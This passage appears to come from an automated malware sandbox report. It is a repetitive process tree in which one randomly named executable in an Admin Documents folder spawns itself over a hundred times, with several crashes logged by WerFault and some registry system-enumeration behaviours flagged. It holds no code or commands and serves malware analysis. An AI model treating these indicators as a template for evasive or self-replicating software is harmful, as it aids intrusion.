- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7072
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7584
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:2860
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5860
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 28
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:4248
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7252
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5956
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5976
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6516
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6908
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6608
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:1480
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7128
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3572
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7988
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4084
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5164
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6564
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7204
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:1876
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5360
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8140
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6204
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5984
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6944
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3124
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6848
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5448
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3992
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:560
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8804
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9084
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4176
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5000
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8484
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:204
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9188
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8116
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8280
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6664
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9164
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8756
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9064
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8524
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3488
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:2900
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6548
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4764
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 28
      4⤵
      Program crash
      PID:9108
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 28
      4⤵
      Program crash
      PID:4012
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:2748
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4456
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4404
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7272
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8252
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6644
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6980
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8568
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7876
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4352
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 28
      4⤵
      Program crash
      PID:5092
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8084
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5312
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8396
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4352
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7688
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6512
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3696
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9208
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8708
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7092
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8032
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:2180
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3280
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8460
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6320
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5412
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 28
      4⤵
      Program crash
      PID:5184
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8016
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3132
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3984
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:8064
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5184
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9532
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9800
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10100
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9296
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9932
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:4848
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10612
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11072
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9924
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10136
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11676
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11392
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11440
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13000
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:12500
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:12124
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14260
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11668
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6780
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11228
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9608
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11552
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11064
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14224
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11628
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14376
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14832
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15160
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14348
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14916
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:1784
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9088
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15136
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 15136 -s 28
      4⤵
      Program crash
      PID:10656
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11824
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13332
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:1272
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15104
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13556
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14240
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10104
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13684
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11800
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15176
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:14440
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15620
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15900
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15028
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15416
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9880
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:16224
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 16224 -s 28
      4⤵
      Program crash
      PID:10692
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9648
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9160
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:3256
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9724
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9468
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15412
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13596
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:13036
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:5220
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6156
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15940
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10596
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10572
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:6364
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:11956
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:15656
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:7208
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:10264
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:12932
- - C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    C:\Users\Admin\Documents\cNu42Z1UVCydZYyJC90EgaIO.exe
    3⤵
    PID:9756
